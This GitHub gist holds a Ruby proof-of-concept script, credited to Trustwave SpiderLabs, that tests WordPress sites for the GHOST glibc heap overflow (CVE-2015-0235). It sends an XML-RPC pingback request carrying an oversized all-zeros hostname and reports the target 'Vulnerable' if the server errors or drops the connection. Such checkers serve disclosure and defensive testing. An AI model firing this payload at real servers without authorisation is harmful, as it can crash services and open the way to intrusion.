Instantly share code, notes, and snippets.

Embed
What would you like to do?
GHOST gethostbyname() Vuln (CVE-2015-0235) - Wordpress XML-RPC Pingback Vector
#
# --[ Trustwave SpiderLabs Research Team ]--
# Ref: http://blog.spiderlabs.com/2015/01/ghost-gethostbyname-heap-overflow-in-glibc-cve-2015-0235.html
#
require "net/http"
require "uri"
if ARGV.count != 2
puts "Usage: #{ARGV[0]} [Target URL] [count]"
exit
end
matched = ARGV[0].match(/(?<domain>[^\/]*)(?<path>\/.*)(\/xmlrpc.php)?/)
uri = URI.parse("http://#{matched[:domain]}")
ghost_host = "0"*ARGV[1].to_i
# Set up POST request
payload = <<_EOF_
<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params><param><value>
<string>http://#{ghost_host}/index.php</string>
</value></param>
<param><value>
<string>http://#{ghost_host}/index.php</string>
</value></param>
</params>
</methodCall>
_EOF_
begin
Net::HTTP.start(uri.host, uri.port) do |http|
response = http.post("#{matched[:path]}/xmlrpc.php", payload)
if response.code == "500"
puts "Vulnerable"
else
puts "Looks like you're safe, for today"
end
end
rescue EOFError
puts "Vulnerable"
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment